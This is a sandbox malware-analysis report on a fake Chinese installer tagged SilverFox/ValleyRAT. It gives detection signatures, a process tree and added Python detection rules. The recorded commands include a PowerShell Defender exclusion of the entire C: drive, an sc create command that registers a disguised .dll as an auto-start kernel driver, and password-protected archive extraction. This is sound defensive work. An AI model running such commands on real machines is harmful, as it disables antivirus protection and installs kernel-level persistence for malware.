
Windows Analysis Report
#U5b89#U88c5#U7a0b#U5e8f_1.1.4.exe

Overview

General Information

Sample name: #U5b89#U88c5#U7a0b#U5e8f_1.1.4.exe (Joe Sandbox's escaped rendering of the Unicode file name 安装程序_1.1.4.exe; 安装程序 is Chinese for "installer", so the sample presents itself as a generic setup program)
Renamed because original name is a hash value
Original sample name: _1.1.4.exe
Analysis ID: 1580542
MD5: 704d909b74fde4f05ceba394fc91416b
SHA1: e78859d87194b3968f1492e18f93424ccd946d63
SHA256: a7e3fad1d01f1888aa10d040699857288d4c6b4dc0e77eb5381e34c5c9e8e4e9
Tags: exe, SilverFox, ValleyRAT, winos, user-Fadouse

Detection

Score: 96
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Contains functionality to hide a thread from the debugger
Found driver which could be used to inject code into processes
Hides threads from debuggers
Loading BitLocker PowerShell Module
PE file contains section with special chars
Protects its processes via BreakOnTermination flag
Query firmware table information (likely to detect VMs)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Enables security privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: New Kernel Driver Via SC.EXE
Sigma detected: Powershell Defender Exclusion
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • #U5b89#U88c5#U7a0b#U5e8f_1.1.4.exe (PID: 7288 cmdline: "C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.exe" MD5: 704D909B74FDE4F05CEBA394FC91416B)
    • #U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp (PID: 7304 cmdline: "C:\Users\user\AppData\Local\Temp\is-96EUT.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp" /SL5="$20442,6283511,845824,C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.exe" MD5: 833E148BCEB71E3D12C96B53539F24E1)
      • powershell.exe (PID: 7324 cmdline: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7332 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WmiPrvSE.exe (PID: 7524 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
      • #U5b89#U88c5#U7a0b#U5e8f_1.1.4.exe (PID: 7620 cmdline: "C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.exe" /VERYSILENT MD5: 704D909B74FDE4F05CEBA394FC91416B)
        • #U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp (PID: 7636 cmdline: "C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp" /SL5="$302A6,6283511,845824,C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.exe" /VERYSILENT MD5: 833E148BCEB71E3D12C96B53539F24E1)
          • 7zr.exe (PID: 7724 cmdline: 7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald MD5: 84DC4B92D860E8AEA55D12B1E87EA108)
            • conhost.exe (PID: 7760 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • 7zr.exe (PID: 7812 cmdline: 7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs MD5: 84DC4B92D860E8AEA55D12B1E87EA108)
            • conhost.exe (PID: 7820 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7692 cmdline: cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7708 cmdline: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7716 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7892 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7908 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7916 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7924 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7944 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7968 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 8024 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 8040 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 8048 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 8092 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 8108 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 8116 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 8160 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 8176 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 8184 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 3608 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5296 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 3120 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 3492 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1148 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2472 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 3752 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1596 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2312 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 3300 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7036 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 396 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7464 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7416 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2000 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2336 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2416 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7608 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7316 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7604 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7700 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7732 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7764 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7772 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7768 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7832 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7856 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7848 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7820 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7912 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7976 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 8008 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 416 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 4476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 8088 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 8072 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 8080 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 8120 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7368 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7328 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7348 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7404 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7572 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 8112 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 8140 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 8148 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2992 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2256 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2676 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 772 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 3220 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1748 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2844 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 708 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2056 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2568 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2736 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 1596 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7280 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7072 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2668 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6600 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7076 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 3336 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5264 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7584 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7308 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 4020 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 4928 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7316 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7296 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2516 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7720 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7756 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7716 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 3604 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  • cleanup
No configs have been found
No yara matches

System Summary

Source: Process started. Author: Florian Roth (Nextron Systems). Data: Command: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-96EUT.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp" /SL5="$20442,6283511,845824,C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.exe", ParentImage: C:\Users\user\AppData\Local\Temp\is-96EUT.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp, ParentProcessId: 7304, ParentProcessName: #U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp, ProcessCommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 7324, ProcessName: powershell.exe
Source: Process started. Author: Nasreddine Bencherchali (Nextron Systems). Data: Command: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine|base64offset|contains: , Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7692, ParentProcessName: cmd.exe, ProcessCommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ProcessId: 7708, ProcessName: sc.exe
Source: Process started. Author: Florian Roth (Nextron Systems). Data: Command: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-96EUT.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp" /SL5="$20442,6283511,845824,C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.exe", ParentImage: C:\Users\user\AppData\Local\Temp\is-96EUT.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp, ParentProcessId: 7304, ParentProcessName: #U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp, ProcessCommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 7324, ProcessName: powershell.exe
Source: Process started. Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community. Data: Command: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine|base64offset|contains: , Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7692, ParentProcessName: cmd.exe, ProcessCommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ProcessId: 7708, ProcessName: sc.exe
Source: Process started. Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements). Data: Command: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-96EUT.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp" /SL5="$20442,6283511,845824,C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.exe", ParentImage: C:\Users\user\AppData\Local\Temp\is-96EUT.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp, ParentProcessId: 7304, ParentProcessName: #U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp, ProcessCommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 7324, ProcessName: powershell.exe
No Suricata rule has matched
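The Sigma matches above fire on two of the behaviours in the process tree: the Defender exclusion of the whole C: drive via Add-MpPreference, and the kernel-mode service created with sc create ... type= kernel pointing at a .dll under Program Files. Two more behaviours in the tree get no Sigma hit but are just as useful to a responder: 7zr.exe unpacking password-protected .dat archives with the password on the command line, and sc start CleverSoar being retried 31 times. The following is an added example written for this page, not Joe Sandbox or Sigma code: it reimplements those four checks as plain process-creation logic and runs them over events constructed from the command lines in this report. Image paths are taken from the report's Sigma fields and "Code function" lines; the severity labels and the start-loop threshold are this example's own assumptions.

```python
import re
from collections import Counter, namedtuple

Finding = namedtuple("Finding", "rule severity detail")

# Process-creation events constructed from the command lines in the report
# above; only the two fields the checks need are kept.
EVENTS = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "\"powershell.exe\" -Command \"Add-MpPreference -ExclusionPath 'C:\\'\""},
    {"Image": r"C:\Windows\System32\sc.exe",
     "CommandLine": "sc create CleverSoar displayname= CleverSoar binPath= "
                    "\"C:\\Program Files (x86)\\Windows NT\\tProtect.dll\" type= kernel start= auto"},
    {"Image": r"C:\Program Files (x86)\Windows NT\7zr.exe",
     "CommandLine": "7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald"},
    {"Image": r"C:\Program Files (x86)\Windows NT\7zr.exe",
     "CommandLine": "7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs"},
]
# The report's tree shows 31 separate "sc start CleverSoar" invocations.
EVENTS += [{"Image": r"C:\Windows\System32\sc.exe", "CommandLine": "sc start CleverSoar"}] * 31


def image_name(event):
    return event["Image"].rsplit("\\", 1)[-1].lower()


def detect_defender_exclusion(event):
    """Logic of the 'Powershell Defender Exclusion' match: Add-MpPreference with an
    Exclusion* parameter. A drive root is escalated because it exempts the whole
    volume from scanning."""
    if image_name(event) not in ("powershell.exe", "pwsh.exe"):
        return None
    m = re.search(r"Add-MpPreference\b.*?-Exclusion(Path|Process|Extension)\s+['\"]?([^'\"]+)",
                  event["CommandLine"], re.I)
    if not m:
        return None
    kind, value = m.group(1), m.group(2).strip()
    severity = "high" if re.fullmatch(r"[A-Za-z]:\\?", value) else "medium"
    return Finding("defender_exclusion", severity, {"kind": kind, "value": value})


def detect_kernel_service_create(event):
    """Logic of the 'New Kernel Driver Via SC.EXE' match: sc create with type= kernel.
    The binPath is inspected too: a driver image that is not a .sys file under
    System32\\drivers is what stands out in this report."""
    if image_name(event) != "sc.exe":
        return None
    cmd = event["CommandLine"]
    name = re.search(r"\bcreate\s+(\S+)", cmd, re.I)
    if not name or not re.search(r"\btype=\s*kernel\b", cmd, re.I):
        return None
    bp = re.search(r"\bbinpath=\s*(?:\"([^\"]+)\"|(\S+))", cmd, re.I)
    path = (bp.group(1) or bp.group(2)) if bp else ""
    oddities = []
    if not path.lower().endswith(".sys"):
        oddities.append("non-.sys extension")
    if "\\system32\\drivers\\" not in path.lower():
        oddities.append("outside System32\\drivers")
    return Finding("kernel_driver_via_sc", "high" if oddities else "medium",
                   {"service": name.group(1), "binPath": path, "oddities": oddities})


def detect_password_extract(event):
    """7-Zip console extraction with an inline -p password (used twice in the
    report, for res.dat and locale3.dat). Recording the password lets a responder
    open the same archives."""
    if image_name(event) not in ("7zr.exe", "7z.exe", "7za.exe"):
        return None
    m = re.search(r"\s[xe]\s+(?:-\S+\s+)*(\S+).*?\s-p(\S+)", event["CommandLine"])
    if not m:
        return None
    return Finding("password_extract", "medium", {"archive": m.group(1), "password": m.group(2)})


def detect_service_start_loop(events, threshold=5):
    """Count 'sc start <name>' per service; the threshold is an assumed value."""
    counts = Counter()
    for e in events:
        if image_name(e) != "sc.exe":
            continue
        m = re.match(r"\"?\S*?sc(?:\.exe)?\"?\s+start\s+(\S+)", e["CommandLine"], re.I)
        if m:
            counts[m.group(1)] += 1
    return [Finding("service_start_loop", "medium", {"service": n, "starts": c})
            for n, c in counts.items() if c >= threshold]


def analyze(events):
    findings = []
    for event in events:
        for rule in (detect_defender_exclusion, detect_kernel_service_create, detect_password_extract):
            hit = rule(event)
            if hit:
                findings.append(hit)
    findings.extend(detect_service_start_loop(events))
    return findings


if __name__ == "__main__":
    for f in analyze(EVENTS):
        print(f"[{f.severity}] {f.rule}: {f.detail}")
```

Against the report's events this yields one high-severity Defender finding (ExclusionPath C:\), one high-severity kernel-service finding (tProtect.dll is neither a .sys nor under System32\drivers), two archive findings carrying the recovered passwords, and one start-loop finding with 31 starts of CleverSoar.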


AV Detection

Source: C:\Program Files (x86)\Windows NT\hrsw.vbc; ReversingLabs: Detection: 26%
Source: C:\Program Files (x86)\Windows NT\hrsw.vbc; Virustotal: Detection: 37%
Source: C:\Users\user\AppData\Local\Temp\is-BULE6.tmp\update.vbc; ReversingLabs: Detection: 26%
Source: C:\Users\user\AppData\Local\Temp\is-NFHOR.tmp\update.vbc; ReversingLabs: Detection: 26%
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.4.exe; Virustotal: Detection: 8%
Source: Submitted sample; Integrated Neural Analysis Model: Matched 91.2% probability
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.4.exe; Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.4.exe; Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: c:\builddir\threat~1.26\drivers\tfsysmon\objfre_wnet_amd64\amd64\TfSysMon.pdb; source: 7zr.exe, 0000000C.00000003.1798230293.0000000003090000.00000004.00001000.00020000.00000000.sdmp, 7zr.exe, 0000000C.00000003.1798079649.0000000004010000.00000004.00001000.00020000.00000000.sdmp, tProtect.dll.12.dr
(The PDB path is found in the dropped tProtect.dll and in 7zr.exe's memory while it extracts res.dat. objfre_wnet_amd64 is the WDK free (release) build target for 64-bit Server 2003, so the file is a 64-bit kernel driver built from a TfSysMon source tree; it is the image that the sc create CleverSoar ... type= kernel command above registers as a kernel-mode service despite its .dll extension, cf. "Drops files with a non-matching file extension".)
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp; Code function: 6_2_6C0EE090 FindFirstFileA,FindClose,FindClose
